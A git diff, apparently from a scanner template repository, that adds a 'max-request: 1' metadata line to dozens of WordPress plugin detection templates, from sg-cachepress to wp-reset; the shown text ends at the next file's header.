diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/sg-cachepress/
metadata:
+ max-request: 1
plugin_namespace: sg-cachepress
wpscan: https://wpscan.com/plugin/sg-cachepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/sg-security/
metadata:
+ max-request: 1
plugin_namespace: sg-security
wpscan: https://wpscan.com/plugin/sg-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 656ad7dfe5..648ee176ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/shortcodes-ultimate/
metadata:
+ max-request: 1
plugin_namespace: shortcodes-ultimate
wpscan: https://wpscan.com/plugin/shortcodes-ultimate
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/shortpixel-image-optimiser/
metadata:
+ max-request: 1
plugin_namespace: shortpixel-image-optimiser
wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/simple-custom-post-order/
metadata:
+ max-request: 1
plugin_namespace: simple-custom-post-order
wpscan: https://wpscan.com/plugin/simple-custom-post-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/siteguard/
metadata:
+ max-request: 1
plugin_namespace: siteguard
wpscan: https://wpscan.com/plugin/siteguard
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/siteorigin-panels/
metadata:
+ max-request: 1
plugin_namespace: siteorigin-panels
wpscan: https://wpscan.com/plugin/siteorigin-panels
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/smart-slider-3/
metadata:
+ max-request: 1
plugin_namespace: smart-slider-3
wpscan: https://wpscan.com/plugin/smart-slider-3
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/so-widgets-bundle/
metadata:
+ max-request: 1
plugin_namespace: so-widgets-bundle
wpscan: https://wpscan.com/plugin/so-widgets-bundle
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
metadata:
+ max-request: 1
plugin_namespace: stops-core-theme-and-plugin-updates
wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/sucuri-scanner/
metadata:
+ max-request: 1
plugin_namespace: sucuri-scanner
wpscan: https://wpscan.com/plugin/sucuri-scanner
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/svg-support/
metadata:
+ max-request: 1
plugin_namespace: svg-support
wpscan: https://wpscan.com/plugin/svg-support
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/table-of-contents-plus/
metadata:
+ max-request: 1
plugin_namespace: table-of-contents-plus
wpscan: https://wpscan.com/plugin/table-of-contents-plus
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/tablepress/
metadata:
+ max-request: 1
plugin_namespace: tablepress
wpscan: https://wpscan.com/plugin/tablepress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/taxonomy-terms-order/
metadata:
+ max-request: 1
plugin_namespace: taxonomy-terms-order
wpscan: https://wpscan.com/plugin/taxonomy-terms-order
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/the-events-calendar/
metadata:
+ max-request: 1
plugin_namespace: the-events-calendar
wpscan: https://wpscan.com/plugin/the-events-calendar
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/themeisle-companion/
metadata:
+ max-request: 1
plugin_namespace: themeisle-companion
wpscan: https://wpscan.com/plugin/themeisle-companion
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/tinymce-advanced/
metadata:
+ max-request: 1
plugin_namespace: tinymce-advanced
wpscan: https://wpscan.com/plugin/tinymce-advanced
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/translatepress-multilingual/
metadata:
+ max-request: 1
plugin_namespace: translatepress-multilingual
wpscan: https://wpscan.com/plugin/translatepress-multilingual
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
metadata:
+ max-request: 1
plugin_namespace: ultimate-addons-for-gutenberg
wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index b7ad16e281..48481fde3b 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/under-construction-page/
metadata:
+ max-request: 1
plugin_namespace: under-construction-page
wpscan: https://wpscan.com/plugin/under-construction-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 10fd071b0b..b34d196268 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/updraftplus/
metadata:
+ max-request: 1
plugin_namespace: updraftplus
wpscan: https://wpscan.com/plugin/updraftplus
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/use-any-font/
metadata:
+ max-request: 1
plugin_namespace: use-any-font
wpscan: https://wpscan.com/plugin/use-any-font
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/user-role-editor/
metadata:
+ max-request: 1
plugin_namespace: user-role-editor
wpscan: https://wpscan.com/plugin/user-role-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/velvet-blues-update-urls/
metadata:
+ max-request: 1
plugin_namespace: velvet-blues-update-urls
wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/w3-total-cache/
metadata:
+ max-request: 1
plugin_namespace: w3-total-cache
wpscan: https://wpscan.com/plugin/w3-total-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/webp-converter-for-media/
metadata:
+ max-request: 1
plugin_namespace: webp-converter-for-media
wpscan: https://wpscan.com/plugin/webp-converter-for-media
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/webp-express/
metadata:
+ max-request: 1
plugin_namespace: webp-express
wpscan: https://wpscan.com/plugin/webp-express
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/widget-importer-exporter/
metadata:
+ max-request: 1
plugin_namespace: widget-importer-exporter
wpscan: https://wpscan.com/plugin/widget-importer-exporter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woo-cart-abandonment-recovery/
metadata:
+ max-request: 1
plugin_namespace: woo-cart-abandonment-recovery
wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woo-checkout-field-editor-pro/
metadata:
+ max-request: 1
plugin_namespace: woo-checkout-field-editor-pro
wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woo-variation-swatches/
metadata:
+ max-request: 1
plugin_namespace: woo-variation-swatches
wpscan: https://wpscan.com/plugin/woo-variation-swatches
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-gateway-paypal-express-checkout
wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-stripe/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-gateway-stripe
wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 1d41b4ec2c..54dce49b42 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-payments/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-payments
wpscan: https://wpscan.com/plugin/woocommerce-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-paypal-payments/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-paypal-payments
wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-pdf-invoices-packing-slips
wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-services/
metadata:
+ max-request: 1
plugin_namespace: woocommerce-services
wpscan: https://wpscan.com/plugin/woocommerce-services
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce/
metadata:
+ max-request: 1
plugin_namespace: woocommerce
wpscan: https://wpscan.com/plugin/woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wordfence/
metadata:
+ max-request: 1
plugin_namespace: wordfence
wpscan: https://wpscan.com/plugin/wordfence
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-importer/
metadata:
+ max-request: 1
plugin_namespace: wordpress-importer
wpscan: https://wpscan.com/plugin/wordpress-importer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-seo/
metadata:
+ max-request: 1
plugin_namespace: wordpress-seo
wpscan: https://wpscan.com/plugin/wordpress-seo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/worker/
metadata:
+ max-request: 1
plugin_namespace: worker
wpscan: https://wpscan.com/plugin/worker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-fastest-cache/
metadata:
+ max-request: 1
plugin_namespace: wp-fastest-cache
wpscan: https://wpscan.com/plugin/wp-fastest-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-file-manager/
metadata:
+ max-request: 1
plugin_namespace: wp-file-manager
wpscan: https://wpscan.com/plugin/wp-file-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-google-maps/
metadata:
+ max-request: 1
plugin_namespace: wp-google-maps
wpscan: https://wpscan.com/plugin/wp-google-maps
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-mail-smtp/
metadata:
+ max-request: 1
plugin_namespace: wp-mail-smtp
wpscan: https://wpscan.com/plugin/wp-mail-smtp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-maintenance-mode/
metadata:
+ max-request: 1
plugin_namespace: wp-maintenance-mode
wpscan: https://wpscan.com/plugin/wp-maintenance-mode
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-migrate-db/
metadata:
+ max-request: 1
plugin_namespace: wp-migrate-db
wpscan: https://wpscan.com/plugin/wp-migrate-db
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-multibyte-patch/
metadata:
+ max-request: 1
plugin_namespace: wp-multibyte-patch
wpscan: https://wpscan.com/plugin/wp-multibyte-patch
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-optimize/
metadata:
+ max-request: 1
plugin_namespace: wp-optimize
wpscan: https://wpscan.com/plugin/wp-optimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-pagenavi/
metadata:
+ max-request: 1
plugin_namespace: wp-pagenavi
wpscan: https://wpscan.com/plugin/wp-pagenavi
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/wp-reset/
metadata:
+ max-request: 1
plugin_namespace: wp-reset
wpscan: https://wpscan.com/plugin/wp-reset
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
